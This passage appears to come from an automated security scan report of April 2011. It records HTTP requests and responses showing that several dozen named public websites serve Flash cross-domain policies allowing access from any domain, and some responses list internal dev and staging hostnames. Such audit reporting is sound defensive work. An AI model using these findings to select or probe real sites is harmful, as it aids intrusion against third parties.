Set-Cookie: bncom=173.193.214.243.68811301751865710; path=/; domain=.buzznet.com
Last-Modified: Sat, 01 May 2010 08:01:30 GMT
ETag: "ca-4bdbdfda"
Accept-Ranges: bytes
Content-Length: 202
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

7.32. http://www.cafemom.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cafemom.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cafemom.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:25:28 GMT
Server: Apache
Last-Modified: Thu, 21 Jan 2010 22:10:57 GMT
Accept-Ranges: bytes
Content-Length: 201
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml; charset=utf-8

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

7.33. http://www.cbs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cbs.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 13 Aug 2010 17:04:44 GMT
X-Real-Server: ws3182.drt.cbsig.net
Content-Type: application/xml
Cache-Control: max-age=248
Date: Sat, 02 Apr 2011 13:27:26 GMT
Content-Length: 1941
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-fro
...[SNIP]...
<allow-access-from domain="wwwimage.cbs.com" />
<allow-access-from domain="cbs.com" />
<allow-access-from domain="cgi.cbs.com" />
<allow-access-from domain="video.cgi.cbs.com" />
<allow-access-from domain="dev.cgi.cbs.com" />
<allow-access-from domain="dev.cbs.cbsig.net" />
<allow-access-from domain="www.cbsnews.com" />
<allow-access-from domain="wwwimage.cbsnews.com" />
<allow-access-from domain="cbsnews.com" />
<allow-access-from domain="cgi.cbsnews.com" />
<allow-access-from domain="video.cgi.cbsnews.com" />
<allow-access-from domain="*.cbs.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.cbs.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cbsnews.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.cbsnews.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.sportsline.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.sportsline.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.sportsline.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="data.panachetech.com" />
<allow-access-from domain="data15.panachetech.com" />
<allow-access-from domain="*.panachetech.com" />
<allow-access-from domain="*.yourminis.com" />
<allow-access-from domain="vsallaccess.com" />
<allow-access-from domain="www.vsallaccess.com" />
<allow-access-from domain="*.vsallaccess.com" />
<allow-access-from domain="cbsstatic.dev.drt.cbsig.net" />
<allow-access-from domain="*.cbsinteractive.com" />
<allow-access-from domain="*.cnet.com" />
<allow-access-from domain="stage.drt.cbsig.net" />
<allow-access-from domain="*.broccolobster.com" />
...[SNIP]...

7.34. http://www.cbsinteractive.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbsinteractive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cbsinteractive.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:53 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 80
Keep-Alive: timeout=15, max=1000
Connection: Keep-Alive
Content-Type: application/xml

<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

7.35. http://www.cbssports.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbssports.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cbssports.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:25:08 GMT
Server: Apache
Last-Modified: Sun, 27 Feb 2011 21:03:46 GMT
Accept-Ranges: bytes
Content-Length: 2798
Cache-Control: max-age=3600
Expires: Sat, 02 Apr 2011 14:25:08 GMT
X-Media: ws1373-fe.tm
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-access-from domain="sportsline.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.sportsline.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.*.sportsline.com" secure="false" />
...[SNIP]...
<allow-access-from domain="cbssports.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cbssports.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.*.cbssports.com" secure="false" />
...[SNIP]...
<allow-access-from domain="cbsimg.net" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cbsimg.net" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="cbsgames.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cbsgames.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.*.cbsgames.com" secure="false" />
...[SNIP]...
<allow-access-from domain="cbsnews.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cbsnews.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.*.cbsnews.com" secure="false" />
...[SNIP]...
<allow-access-from domain="cbs.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cbs.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.*.cbs.com" secure="false" />
...[SNIP]...
<allow-access-from domain="ncaa.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.ncaa.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.*.ncaa.com" secure="false" />
...[SNIP]...
<allow-access-from domain="maxpreps.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.maxpreps.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.*.maxpreps.com" secure="false" />
...[SNIP]...
<allow-access-from domain="trupreps.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.trupreps.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.*.trupreps.com" secure="false" />
...[SNIP]...
<allow-access-from domain="cbsig.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cbsig.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.*.cbsig.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.akamai.net" />
<allow-access-from domain="*.g.akamai.net" />
<allow-access-from domain="beyond.download.akamai.com" />
<allow-access-from domain="cbssports.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cbssports.com" secure="false" />
...[SNIP]...
<allow-access-from domain="cp32822.edgefcs.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" secure="false" />
...[SNIP]...
<allow-access-from domain="doubleclick.net" />
<allow-access-from domain="*.*.doubleclick.net"/>
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.*.2mdn.net" />
<allow-access-from domain="sandbox.dartmotif.com" />
<allow-access-from domain="my.22squared.com" />
...[SNIP]...

7.36. http://www.clear-request.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.clear-request.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.clear-request.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:04:15 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Thu, 15 Jan 2009 16:15:53 GMT
ETag: "4b90d7-cc-c5400040"
Accept-Ranges: bytes
Content-Length: 204
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

7.37. http://www.cmt.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cmt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cmt.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Last-Modified: Thu, 14 Aug 2008 20:11:47 GMT
ETag: "1c4250f-121-454711d5526c0"
Accept-Ranges: bytes
Content-Length: 289
Content-Type: application/xml
Cache-Control: max-age=600
Date: Sat, 02 Apr 2011 13:38:06 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />

...[SNIP]...

7.38. http://www.colbertnation.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.colbertnation.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.colbertnation.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) PHP/5.3.1
Last-Modified: Wed, 13 Aug 2008 14:31:05 GMT
ETag: "160c686-102-454583d0d9c40"
Accept-Ranges: bytes
Content-Length: 258
Content-Type: application/xml
Cache-Control: max-age=386
Expires: Sat, 02 Apr 2011 14:25:35 GMT
Date: Sat, 02 Apr 2011 14:19:09 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*"/>
   <allow-http-request-hea
...[SNIP]...

7.39. http://www.collegehumor.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.collegehumor.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.collegehumor.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:38 GMT
Server: Apache
Last-Modified: Thu, 17 Mar 2011 00:02:39 GMT
ETag: "9c073-235-49ea2612be5c0"
Accept-Ranges: bytes
Content-Length: 565
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="www.collegehumor.com" />
...[SNIP]...
<allow-access-from domain="dev.collegehumor.com" />
   <allow-access-from domain="staging.collegehumor.com" />
   <allow-access-from domain="collegehumor.com" />
   <allow-access-from domain="*.collegehumor.com" />
   <allow-access-from domain="*.cvcdn.com" />
   <allow-access-from domain="*" to-ports="80"/>
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.40. http://www.comedycentral.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comedycentral.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.comedycentral.com

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 258
Content-Type: text/xml
Last-Modified: Tue, 15 Apr 2008 20:09:33 GMT
ETag: "102-48050b7d"
Accept-Ranges: bytes
Cache-Control: max-age=72
Expires: Sat, 02 Apr 2011 13:38:15 GMT
Date: Sat, 02 Apr 2011 13:37:03 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*"/>
   <allow-http-request-hea
...[SNIP]...

7.41. http://www.contactatonce.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.contactatonce.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.contactatonce.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:56 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sun, 27 Jun 2010 23:26:28 GMT
ETag: "cb-48a0b5558d100"
Accept-Ranges: bytes
Content-Length: 203
Cache-Control: public, must-revalidate, proxy-revalidate
Expires: Sat, 09 Apr 2011 13:45:56 GMT
Vary: Accept-Encoding,User-Agent
Pragma: public
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

7.42. http://www.cracked.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cracked.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cracked.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.6
Last-Modified: Tue, 14 Jul 2009 21:42:53 GMT
ETag: "bf8fd0-6c-46eb15220f140"-gzip
Content-Type: application/xml
Expires: Sat, 02 Apr 2011 13:33:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:33:14 GMT
Content-Length: 108
Connection: close
Set-Cookie: BIGipServerorigin.cracked.com=1083574538.20480.0000; path=/

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>


7.43. http://www.crackle.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.crackle.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.crackle.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 25 Feb 2011 01:20:08 GMT
Accept-Ranges: bytes
ETag: "32a0dd238ad4cb1:f88"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Connection: close
Date: Sat, 02 Apr 2011 13:44:15 GMT
Age: 15631
Content-Length: 126

...<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>


7.44. http://www.craveonline.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.craveonline.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.craveonline.com

Response

HTTP/1.1 200 OK
Server: Apache/2
Vary: Accept-Encoding
X-Served-By: app1v-fe.sb.lax2
Content-Type: text/xml
Content-Length: 260
Date: Sat, 02 Apr 2011 14:19:13 GMT
X-Varnish: 732507065
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS from pxy1v.sb.lax2

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.gorillanation.com --> <cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.45. http://www.curse.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.curse.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.curse.com

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServer=1932476484.20480.0000; path=/
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 00:25:04 GMT
Accept-Ranges: bytes
ETag: "070209a1fd5ca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:39:41 GMT
Xonnection: Xeep-alive
Content-Length: 332

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-pol
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.46. http://www.daylife.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.daylife.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.daylife.com

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Content-Length: 140
Date: Sat, 02 Apr 2011 14:19:13 GMT
X-Varnish: 3945368514
Age: 0
Via: 1.1 varnish
Connection: close


<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
</cross-domain-policy>

7.47. http://www.degrees.info/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.degrees.info
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.degrees.info

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:34 GMT
Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 mod_ssl/2.2.8 OpenSSL/0.9.8g
Last-Modified: Wed, 16 Mar 2011 14:47:14 GMT
ETag: "52c1-db-49e9a9ed8c080"
Accept-Ranges: bytes
Content-Length: 219
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="true" />
</cro
...[SNIP]...

7.48. http://www.docstoc.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.docstoc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.docstoc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 22 Oct 2010 18:22:44 GMT
Accept-Ranges: bytes
ETag: "b44c91e1672cb1:0"
serverID: web02
Date: Sat, 02 Apr 2011 13:30:53 GMT
Connection: keep-alive
Content-Length: 151

<cross-domain-policy>
   <allow-access-from domain="docstoc.com" to-ports="*" />
   <allow-access-from domain="*" to-ports="*" />
</cross-domain-policy>

7.49. http://www.doctoroz.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.doctoroz.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.doctoroz.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml; charset=utf-8
ETag: "4e5a-c9-4711fc791f940"
Last-Modified: Fri, 14 Aug 2009 20:20:13 GMT
Server: Apache
Cache-Control: max-age=3600
Date: Sat, 02 Apr 2011 13:40:44 GMT
Content-Length: 201
Connection: close
X-N: S

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>
...[SNIP]...

7.50. http://www.ebaumsworld.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ebaumsworld.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ebaumsworld.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:31 GMT
Server: Apache/2.2.17 (EL)
Last-Modified: Mon, 02 Feb 2009 22:06:45 GMT
Accept-Ranges: bytes
Content-Length: 213
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" to-ports="*" />
</cross-do
...[SNIP]...

7.51. http://www.education.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.education.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.education.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 13:34:11 GMT
Content-Type: text/xml
Content-Length: 201
Last-Modified: Mon, 28 Feb 2011 18:40:05 GMT
Connection: close
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

7.52. http://www.ehow.co.uk/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ehow.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ehow.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 01 Apr 2011 02:54:34 GMT
Content-Type: text/xml
Date: Sat, 02 Apr 2011 14:00:19 GMT
Content-Length: 117
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

7.53. http://www.eventful.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.eventful.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.eventful.com

Response

HTTP/1.0 200 OK
Connection: close
Expires: Sat, 16 Apr 2011 13:35:52 GMT
Cache-Control: max-age=1209600
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "1641692581"
Last-Modified: Wed, 10 Feb 2010 18:55:07 GMT
Content-Length: 201
Date: Sat, 02 Apr 2011 13:35:52 GMT
Server: lighttpd

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

7.54. http://www.everydayhealth.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.everydayhealth.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.everydayhealth.com

Response

HTTP/1.1 200 OK
Content-Length: 369
Content-Type: text/xml
Last-Modified: Fri, 17 Dec 2010 22:02:56 GMT
Accept-Ranges: bytes
ETag: "0e8ca28369ecb1:3da6"
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB07
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:26:17 GMT
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!--used for flash slideshows -->
<cross-domain-policy>
   <site-control permi
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.55. http://www.evtv1.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.evtv1.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.evtv1.com

Response

HTTP/1.1 200 OK
Content-Length: 216
Content-Type: text/xml
Last-Modified: Tue, 03 Mar 2009 14:07:08 GMT
Accept-Ranges: bytes
ETag: "2ed3e15699cc91:1433"
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR PSAi PSDi OUR BUS UNI COM NAV INT STA OTC'
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:53:45 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-
...[SNIP]...

7.56. http://www.ew.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ew.com
Path:   /crossdomain.xml

Issue detail

